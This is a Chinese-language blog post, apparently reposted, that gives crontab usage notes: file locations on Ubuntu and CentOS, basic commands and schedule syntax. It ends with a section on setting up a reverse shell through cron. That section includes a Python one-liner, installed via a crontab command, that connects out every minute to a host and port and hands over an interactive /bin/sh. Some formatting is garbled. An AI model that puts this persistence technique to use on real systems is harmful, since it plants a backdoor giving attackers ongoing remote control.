crontab命令使用记录(精,反弹shell)
生活随笔
收集整理的這篇文章主要介紹了
crontab命令使用记录(精,反弹shell)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
1. 編輯定時任務
crontab -elinux通用路徑:/etc/crontab
ubuntu被編輯的文件路徑一般為:/var/spool/cron/crontabs/當前用戶
centos被編輯的文件路徑一般為:/var/spool/cron/當前用戶
2. 刪除定時任務(情況)
crontab -r3. 查看現有定時任務
crontab -l4. crountab 定時任務規則編寫
*/5 * * * * Command ??????????????????????每5分鐘執行一次命令5 * * * * Command ????????????????????????每小時的第5分鐘執行一次命令 30 18 * * * Command?????????????????????指定每天下午的 6:30 執行一次命令? 30 7 8 * * Command??????????????????????指定每月8號的7:30分執行一次命令? 30 5 8 6 * Command?????????????????????指定每年的6月8日5:30執行一次命令? 30 6 * * 0 Command??????????????????????指定每星期日的6:30執行一次命令5. 反彈shell
可能大家平時比較少人ubuntu,所以不大知道這個特性
測試結果:
/etc/crontab和/var/spool/cron/crontabs/,bash -i反彈shell都失敗。不過python,perl可以,centos和ubuntu都自帶python,perl。
Python
執行以下命令,以當前bash權限用戶,創建一個crontab文件
(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -代碼說明:
crontab -將管道符前面的內容寫入到當前用戶的crontab文件里
-
-
-
-
- 表示每一分鐘執行該命令,等同于/1?*
如果是ubuntu的root權限,以上命令會寫到/var/spool/cron/crontabs/root文件
- 表示每一分鐘執行該命令,等同于/1?*
-
-
-
如果是centos的root權限,以上命令會寫到/var/spool/cron/root, 執行成功后,相應的crontab文件會創建或者追加如下內容
* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Bash
總結
以上是生活随笔為你收集整理的crontab命令使用记录(精,反弹shell)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python取出字典中的所有值的两种方法
- 下一篇: 【XSY3048 】Polynomina